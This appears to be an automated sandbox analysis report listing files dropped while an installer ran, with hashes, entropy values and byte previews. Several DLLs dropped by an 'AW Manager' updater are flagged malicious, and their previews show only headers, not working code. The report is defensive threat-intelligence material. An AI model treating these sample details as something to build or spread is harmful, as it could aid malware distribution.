                                                                                                                                                                                                                                                                        Entropy (8bit):1.2522518869676085
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:JSbX72Fj5FAGzYLIlH7RpuBht7777777777777777777777777sDHFqeY7w0ZobO:J10Iv8uMB7waEdoSFk
                                                                                                                                                                                                                                                                        MD5:A55FDFE58B7D5317B038B3D4B7E8959E
                                                                                                                                                                                                                                                                        SHA1:64D9DF5E050EE53DD4F20432A7B42F65FD163488
                                                                                                                                                                                                                                                                        SHA-256:9654F4326A9B9C6E5E280F766AA18F63DD0462F29E8D253B8F86A5E646CDC5D5
                                                                                                                                                                                                                                                                        SHA-512:B371E32B5AD4CEEAEE86EACA7491CF55B27186877D1281ECAF7A4A4F17D7F019EAA478EAFA91921EDE607618211AA22736950AADF5DF864A04DC5DCAD4365F47
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                        Entropy (8bit):1.2523802277746197
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:JSbX72FjBFAGzYLIlH7RpuBht7777777777777777777777777sDHFnmTJlblhbv:JN0Iv8uQllVoOJ21Fk
                                                                                                                                                                                                                                                                        MD5:2A4397F1B23CA4E9562D456093657737
                                                                                                                                                                                                                                                                        SHA1:DEF97E1CB3DBA4FEA7ECD1274C6D788B09886672
                                                                                                                                                                                                                                                                        SHA-256:48E28A989F152E1DB118B8C11EE60C37ADB7D0FA914F6D24710A9E0D730393CF
                                                                                                                                                                                                                                                                        SHA-512:D86F013BD731B6EA06E1ED3FDF50B4AB1106DC2FF9682AA4CCD5BD61599970EAD954798590AF9CEE01CD1678A37FB95AC47BBABDBFB02A18D3A8C62643574736
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                        Entropy (8bit):1.2181009124044428
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:JSbX72FjBvsXAlfLIlHuRpHhG7777777777777777777777777ZDHFcmiyDOLBxp:J6UIwGymiVLBxfck9F
                                                                                                                                                                                                                                                                        MD5:FC3D5D68B10D7E04437E078C135F0E51
                                                                                                                                                                                                                                                                        SHA1:F2667C7E6A5A774555DE485E76ABF20CDDDDEDE8
                                                                                                                                                                                                                                                                        SHA-256:1CDA636EFDB0790406830C2D880E2708450C951C13724289AD30BF9375845F90
                                                                                                                                                                                                                                                                        SHA-512:6D611039B4624F2D1F131658BB77FBCBD66AE8FD4BAEBEC3FFBC3FA4E8B46117D53D82A97572198CC84AC0A96F291AD813E4B02F85390439C6DDBB9432B9AC76
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):24576
                                                                                                                                                                                                                                                                        Entropy (8bit):2.0039686451819394
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:ihR1vFT4acUdffjfnuf9fqRCgyCf2Mfoco2WGQfrfrufx:e1NEaDPxyZFGQfXw
                                                                                                                                                                                                                                                                        MD5:AB8AF97C9582DD4BC61F1D463EE393A0
                                                                                                                                                                                                                                                                        SHA1:8EA174187A26F06DEDA541D81383503B90022C80
                                                                                                                                                                                                                                                                        SHA-256:CF844D4D1EE2A87F4F83CB96803186F28817267A43E4F127F0EF47276155418B
                                                                                                                                                                                                                                                                        SHA-512:D405031BA98B8D13C6DC8F0D30F26E39D58461384844EB8B8F20DE369FFA137871B932B844592FEFD5D3F81537CC5B8815EA4ADB5409DF9750069DF2BF4826C6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows icon resource - 8 icons, 32x32, 16 colors, 4 bits/pixel, 24x24, 16 colors, 4 bits/pixel
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):14534
                                                                                                                                                                                                                                                                        Entropy (8bit):5.08612958031438
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:gWiXwlNwH5AxLV1th7743rsl0rMeaJ/1Nc6keo0/waIkllDh2syOqniTJ8Q:gWd7wqRGYlEMe6/3NkmIkR2syOqi1X
                                                                                                                                                                                                                                                                        MD5:C2649AD15118FD46780D6FCBC38447D0
                                                                                                                                                                                                                                                                        SHA1:F32EFACB590F5028A9F5DA7236CC74086A3C87EC
                                                                                                                                                                                                                                                                        SHA-256:F0F4D5BF1DE9D2463031520AFF51FEB1E7D432ECEA447534A91CBBD79832AC89
                                                                                                                                                                                                                                                                        SHA-512:322EA628ED541713457248341B2CD0A95B6DD3661C9E1E4A22285368872A1B2A89808E272E2A6195B34FD47BD02C33AA893D0C324FBE35E4D65C5E5F401A81AE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:...... ..........................n... ..........V...........................h....... .... ............... ......*........ .h...^4..(... ...@.....................................................................................................................................................................................................................................ww.w............fg.fh...........fg.fg..........x.x.............f....v..........fx...fo.........fo...f..........w....f...........................w..w............wx.w.....................................................................................................................................................................................................................................?...?...?...?...?...?...?...?...?...?...?...?...............................................................?....(.......0........... .....................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):43973
                                                                                                                                                                                                                                                                        Entropy (8bit):7.311238919310844
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:tkh0lOcdVMA1bVrbAd2o0Om4zwfBw9P2aEuZeQmb6WEEvCMn8O+RMkqbRYR+mny:t+KVph7ywJwB5ZeQmbwMn8zRMkpy
                                                                                                                                                                                                                                                                        MD5:627EB577DA1600430450F554116ED32C
                                                                                                                                                                                                                                                                        SHA1:D7A198BA82721CB335D20BF27FA5F6762DDEE92B
                                                                                                                                                                                                                                                                        SHA-256:2BC3A9CE18A7FCB66BB6FAB198CFAF68DD1A9321BDE70010814073983CEB1FDC
                                                                                                                                                                                                                                                                        SHA-512:5210023AA54AC46DA86A0F41BA23FC4D95911385D42199459189A96CF88ADB0D2B1CAC6124E4B9D8C801AE553C884CFE60C96C4B8D637980EDF1F572F9A8C8E0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:............ .h...V......... ......... .... .....F...00.... ..%............ ./g...D..(....... ..... .....................................................................k..y.....................................}..T..4..u...o...o...o...q...{..............K...2..t...n...m...p...r...u...v ..v ..x#..l...O..........O..f...r...o...o...o...n...s...v...u...u...v ..n...Y..........]..n...},..P.._............Q..o...v ..w!..n...W..........]..d...t......................[..m...w!..w!..n...W..........]..f...j......................Q..o...v ..w!..n...W..........]..e...o......................S..o...v ..w!..n...W..........]..e...k......................[..m...w!..w!..n...W..........\..o...x#...2..B..^........G..p...v ..w!..n...W..........N..d...s...q...q...p...m...m...s...u...u...w!..o...Z.............g..9..z'..r...m...o...s...t...v ..w"..x#..g...M..............................i..9..z'..p...k...p...F.............................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows icon resource - 8 icons, 32x32, 16 colors, 4 bits/pixel, 24x24, 16 colors, 4 bits/pixel
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):14534
                                                                                                                                                                                                                                                                        Entropy (8bit):5.08612958031438
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:gWiXwlNwH5AxLV1th7743rsl0rMeaJ/1Nc6keo0/waIkllDh2syOqniTJ8Q:gWd7wqRGYlEMe6/3NkmIkR2syOqi1X
                                                                                                                                                                                                                                                                        MD5:C2649AD15118FD46780D6FCBC38447D0
                                                                                                                                                                                                                                                                        SHA1:F32EFACB590F5028A9F5DA7236CC74086A3C87EC
                                                                                                                                                                                                                                                                        SHA-256:F0F4D5BF1DE9D2463031520AFF51FEB1E7D432ECEA447534A91CBBD79832AC89
                                                                                                                                                                                                                                                                        SHA-512:322EA628ED541713457248341B2CD0A95B6DD3661C9E1E4A22285368872A1B2A89808E272E2A6195B34FD47BD02C33AA893D0C324FBE35E4D65C5E5F401A81AE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:...... ..........................n... ..........V...........................h....... .... ............... ......*........ .h...^4..(... ...@.....................................................................................................................................................................................................................................ww.w............fg.fh...........fg.fg..........x.x.............f....v..........fx...fo.........fo...f..........w....f...........................w..w............wx.w.....................................................................................................................................................................................................................................?...?...?...?...?...?...?...?...?...?...?...?...............................................................?....(.......0........... .....................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):43973
                                                                                                                                                                                                                                                                        Entropy (8bit):7.311238919310844
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:tkh0lOcdVMA1bVrbAd2o0Om4zwfBw9P2aEuZeQmb6WEEvCMn8O+RMkqbRYR+mny:t+KVph7ywJwB5ZeQmbwMn8zRMkpy
                                                                                                                                                                                                                                                                        MD5:627EB577DA1600430450F554116ED32C
                                                                                                                                                                                                                                                                        SHA1:D7A198BA82721CB335D20BF27FA5F6762DDEE92B
                                                                                                                                                                                                                                                                        SHA-256:2BC3A9CE18A7FCB66BB6FAB198CFAF68DD1A9321BDE70010814073983CEB1FDC
                                                                                                                                                                                                                                                                        SHA-512:5210023AA54AC46DA86A0F41BA23FC4D95911385D42199459189A96CF88ADB0D2B1CAC6124E4B9D8C801AE553C884CFE60C96C4B8D637980EDF1F572F9A8C8E0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:............ .h...V......... ......... .... .....F...00.... ..%............ ./g...D..(....... ..... .....................................................................k..y.....................................}..T..4..u...o...o...o...q...{..............K...2..t...n...m...p...r...u...v ..v ..x#..l...O..........O..f...r...o...o...o...n...s...v...u...u...v ..n...Y..........]..n...},..P.._............Q..o...v ..w!..n...W..........]..d...t......................[..m...w!..w!..n...W..........]..f...j......................Q..o...v ..w!..n...W..........]..e...o......................S..o...v ..w!..n...W..........]..e...k......................[..m...w!..w!..n...W..........\..o...x#...2..B..^........G..p...v ..w!..n...W..........N..d...s...q...q...p...m...m...s...u...u...w!..o...Z.............g..9..z'..r...m...o...s...t...v ..w"..x#..g...M..............................i..9..z'..p...k...p...F.............................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows icon resource - 8 icons, 32x32, 16 colors, 4 bits/pixel, 24x24, 16 colors, 4 bits/pixel
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):14534
                                                                                                                                                                                                                                                                        Entropy (8bit):5.08612958031438
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:gWiXwlNwH5AxLV1th7743rsl0rMeaJ/1Nc6keo0/waIkllDh2syOqniTJ8Q:gWd7wqRGYlEMe6/3NkmIkR2syOqi1X
                                                                                                                                                                                                                                                                        MD5:C2649AD15118FD46780D6FCBC38447D0
                                                                                                                                                                                                                                                                        SHA1:F32EFACB590F5028A9F5DA7236CC74086A3C87EC
                                                                                                                                                                                                                                                                        SHA-256:F0F4D5BF1DE9D2463031520AFF51FEB1E7D432ECEA447534A91CBBD79832AC89
                                                                                                                                                                                                                                                                        SHA-512:322EA628ED541713457248341B2CD0A95B6DD3661C9E1E4A22285368872A1B2A89808E272E2A6195B34FD47BD02C33AA893D0C324FBE35E4D65C5E5F401A81AE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:...... ..........................n... ..........V...........................h....... .... ............... ......*........ .h...^4..(... ...@.....................................................................................................................................................................................................................................ww.w............fg.fh...........fg.fg..........x.x.............f....v..........fx...fo.........fo...f..........w....f...........................w..w............wx.w.....................................................................................................................................................................................................................................?...?...?...?...?...?...?...?...?...?...?...?...............................................................?....(.......0........... .....................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):43973
                                                                                                                                                                                                                                                                        Entropy (8bit):7.311238919310844
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:tkh0lOcdVMA1bVrbAd2o0Om4zwfBw9P2aEuZeQmb6WEEvCMn8O+RMkqbRYR+mny:t+KVph7ywJwB5ZeQmbwMn8zRMkpy
                                                                                                                                                                                                                                                                        MD5:627EB577DA1600430450F554116ED32C
                                                                                                                                                                                                                                                                        SHA1:D7A198BA82721CB335D20BF27FA5F6762DDEE92B
                                                                                                                                                                                                                                                                        SHA-256:2BC3A9CE18A7FCB66BB6FAB198CFAF68DD1A9321BDE70010814073983CEB1FDC
                                                                                                                                                                                                                                                                        SHA-512:5210023AA54AC46DA86A0F41BA23FC4D95911385D42199459189A96CF88ADB0D2B1CAC6124E4B9D8C801AE553C884CFE60C96C4B8D637980EDF1F572F9A8C8E0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:............ .h...V......... ......... .... .....F...00.... ..%............ ./g...D..(....... ..... .....................................................................k..y.....................................}..T..4..u...o...o...o...q...{..............K...2..t...n...m...p...r...u...v ..v ..x#..l...O..........O..f...r...o...o...o...n...s...v...u...u...v ..n...Y..........]..n...},..P.._............Q..o...v ..w!..n...W..........]..d...t......................[..m...w!..w!..n...W..........]..f...j......................Q..o...v ..w!..n...W..........]..e...o......................S..o...v ..w!..n...W..........]..e...k......................[..m...w!..w!..n...W..........\..o...x#...2..B..^........G..p...v ..w!..n...W..........N..d...s...q...q...p...m...m...s...u...u...w!..o...Z.............g..9..z'..r...m...o...s...t...v ..w"..x#..g...M..............................i..9..z'..p...k...p...F.............................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):345054
                                                                                                                                                                                                                                                                        Entropy (8bit):4.386457360509756
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:0K9KmK9KIK7KIK7KYK7KIK7KYK7KIK7KYK7KIK7KYK7KIK7KYK7KIK7KYK7KIK7y:5
                                                                                                                                                                                                                                                                        MD5:1C1DAFDB64254F18B86600DD5E53F244
                                                                                                                                                                                                                                                                        SHA1:A92A1D01E42949BCFBAE3ADFAE1AB9CEA4197303
                                                                                                                                                                                                                                                                        SHA-256:B7FCE48CD901303FB58367551FAA554301388FA934DFED3932FE2ABA93FB5FB5
                                                                                                                                                                                                                                                                        SHA-512:D44842276E7B83C9CB0391144C78AD5BE937F73E262EC82A52567C8F405515C295946D89E32F2D547193EE475B0408D6A106EF7833BADB31A864954E07AF4492
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.2023-10-03 11:48:47, Info DPX Started DPX phase: Resume and Download Job..2023-10-03 11:48:47, Info DPX Started DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:47, Info DPX Ended DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:47, Info DPX Started DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:47, Info DPX Ended DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:47, Info DPX CJob::Resume completed with status: 0x0..2023-10-03 11:48:47, Info DPX Ended DPX phase: Resume and Download Job..2023-10-03 11:48:49, Info DPX Started DPX phase: Resume and Download Job..2023-10-03 11:48:49, Info DPX Started DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:49, Info DPX Ended DPX phase: Apply Deltas Provided In File..2023-10-03 11:48:49, Info
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):364484
                                                                                                                                                                                                                                                                        Entropy (8bit):5.365500023851405
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaus:zTtbmkExhMJCIpEn
                                                                                                                                                                                                                                                                        MD5:FF2925D4F357676D581541088771A6AA
                                                                                                                                                                                                                                                                        SHA1:D0A999E801F4F47827745D6DA02F20EE45C40E45
                                                                                                                                                                                                                                                                        SHA-256:26941610E4A655CFCEC21A0301E434E40ECDA2EB6D717222BAC58FC366557583
                                                                                                                                                                                                                                                                        SHA-512:5FF762B4F079C2644793D447308DB5EE7468382086710EB8BD1208EDBA232E4AD498CE523BF486AD6D08F40203675FB100C566D0B46F76810C40DAB8F7F15724
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                                                                                                                                                                        Process:C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):11
                                                                                                                                                                                                                                                                        Entropy (8bit):3.2776134368191165
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:1EX:10
                                                                                                                                                                                                                                                                        MD5:EC3584F3DB838942EC3669DB02DC908E
                                                                                                                                                                                                                                                                        SHA1:8DCEB96874D5C6425EBB81BFEE587244C89416DA
                                                                                                                                                                                                                                                                        SHA-256:77C7C10B4C860D5DDF4E057E713383E61E9F21BCF0EC4CFBBC16193F2E28F340
                                                                                                                                                                                                                                                                        SHA-512:35253883BB627A49918E7415A6BA6B765C86B516504D03A1F4FD05F80902F352A7A40E2A67A6D1B99A14B9B79DAB82F3AC7A67C512CCF6701256C13D0096855E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:[General]..
                                                                                                                                                                                                                                                                        Process:C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):638
                                                                                                                                                                                                                                                                        Entropy (8bit):5.31483952249434
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:9CiDlanFAjZQBGSbJkWjTOnDMtSPKWVFAjKGeGSbJkWjTOnDMtS3:jcFAiXGWj2zqeXGWj2/
                                                                                                                                                                                                                                                                        MD5:D553FDC69C331095AE73A1ED1288E9EB
                                                                                                                                                                                                                                                                        SHA1:9E12E46DE7AF406D31506968940F21823ADAF3BE
                                                                                                                                                                                                                                                                        SHA-256:B67986979E0EAFA4DDE1AE22F7C35254EEEE3DAAFCDCB58C82A68FFCE3EBAF4D
                                                                                                                                                                                                                                                                        SHA-512:8D4EE460D52669F178DD02B0E4695D9F849BC1CBFED3E65656F9D16E7F7E36BAAF2B64FE0288BB7D8DCBA45E8A66631ED5F78B025836FD5E7B82805A313CA476
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:[Hit {D33043B2-ADDB-4B0D-8E03-908F81A4FBCA}]..Queue Time = 15..Hit Type = lifecycle..Life control = start..Protocol Version = 3..Application ID = 57adf5f3482b9a503e2bed2b..Application Version = 5.0.3..Client ID = 57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D..Session ID = {A27D411C-7F55-4869-A6CE-333CF228670F}....[Hit {B6F5E7E6-97D6-497A-B99E-D622FFCC56CC}]..Queue Time = 0..Hit Type = lifecycle..Life control = end..Life status = success..Protocol Version = 3..Application ID = 57adf5f3482b9a503e2bed2b..Application Version = 5.0.3..Client ID = 57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D..Session ID = {A27D411C-7F55-4869-A6CE-333CF228670F}..
                                                                                                                                                                                                                                                                        Process:C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):783784
                                                                                                                                                                                                                                                                        Entropy (8bit):6.388227283064485
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:JB0aQYpzr8qjh/Kf+UA0i6mjqBUBavHqNajAJLVxAKNYFglvqrr3m/Xz/b/cEV:v0ax050IUBeqkeVJYFCqrLm/Xz/b/cEV
                                                                                                                                                                                                                                                                        MD5:07DF9CA625C2CB953B2A7F7F699CEE7C
                                                                                                                                                                                                                                                                        SHA1:3225E84B51BA76EB650231C94231B70B70B997C9
                                                                                                                                                                                                                                                                        SHA-256:265D462E9BD3FC4BDF925590A852707A52E0707407FDC4BA40A468542E8DBB77
                                                                                                                                                                                                                                                                        SHA-512:104A32900AC3F7A3815CE4670AA430677EB48BD3B8A5E17F0A05C333B8FAF776756408784C8191EA51FFD54AD52D7FCBF2611570A275EFDC6BF1B04B5706F9FD
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........p..[.y.[.y.[.y.Ozz.V.y.Oz|...y.7e}.J.y.7ez.L.y.7e|...y.Oz}.C.y.Oz..Z.y.Ozx.F.y.[.x.h.y.ep...y.ey.Z.y.e..Z.y.[...Y.y.e{.Z.y.Rich[.y.........................PE..L...].\`.........."!.........F............................................... ............@..........................M.......N....... .......................@..$...h5..p....................6.......5..@............................................text...h........................... ..`.rdata..............................@..@.data........`.......H..............@....rsrc........ ......................@..@.reloc..$....@......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):385960
                                                                                                                                                                                                                                                                        Entropy (8bit):6.405386710561945
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:vrDow+ZsrLg3bmfKlGzIqSqYf+SAOfVKE/M5TiyX:3owv43bqKlRHJVa9iyX
                                                                                                                                                                                                                                                                        MD5:D07DDD437009EBB9C21882579BF2DF0D
                                                                                                                                                                                                                                                                        SHA1:A24A636DB25ED29E5353FA5D274BF80C2AB8AD98
                                                                                                                                                                                                                                                                        SHA-256:C4F49B995E259A043AF81D987C6781B8736F5709348BB997EDAD183CCC396CAF
                                                                                                                                                                                                                                                                        SHA-512:8C845EC3EFFC0041DB3A550ADDDC1F175E1169CA00767C89D38FABAA59F97AE987B529C0AD71D0DEF0007A21FB3FD98200B0834408C5889D93F9EA035C60ECA3
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{........................?.........................................................C......C.......C.............C.......Rich............PE..L.....\`.........."!................ZV....................................................@.........................`l......4t..........0........................>..8...p...............................@............... ............................text...O........................... ..`.rdata..............................@..@.data................x..............@....rsrc...0...........................@..@.reloc...>.......@..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):881064
                                                                                                                                                                                                                                                                        Entropy (8bit):6.445970518390351
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:p/NO9Ibn5dhulTll7VFv1/dSYKOC8fE/cod+I++qHfV5xJd9zlY:aKtulJl7VFv1lxKOC8fE/cod+j+qHfV8
                                                                                                                                                                                                                                                                        MD5:5A25FB13ED470B77EEFD2EB89CB62C47
                                                                                                                                                                                                                                                                        SHA1:3DBE567E3C8C8CD0F7E3C71A2536578EE11BF2A6
                                                                                                                                                                                                                                                                        SHA-256:0DCA4854897CA77080C57936AD5C7C6C5F5C656A5785C09C7D2C1D196E4F3336
                                                                                                                                                                                                                                                                        SHA-512:2EC64666AD42E955E91378AF855DA59D3BCFB4CC3574BF023DDA878C7D3E3DEC442625DE6E6B0434D1CAF86A525395B04038CF7FDC6C292405D9F19C6F4E9952
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j...............`......`.k........................`......`......`.....................................w............Rich....................PE..L.....\`.........."!................X.....................................................@.........................0...t............................X..............h...p..............................@............................................text...>........................... ..`.rdata..............................@..@.data...L...........................@....rsrc................f..............@..@.reloc...............l..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe
                                                                                                                                                                                                                                                                        File Type:Generic INItialization configuration [v113]
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1059
                                                                                                                                                                                                                                                                        Entropy (8bit):5.4895469933362095
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:SS69Kqf+rqjOH7kLfSdWS6Wyqf+tPw8LfSdOn:r6l+rfHYLKB6WD+tPw8LKY
                                                                                                                                                                                                                                                                        MD5:068B29338F253C6B6F0496409C0E2704
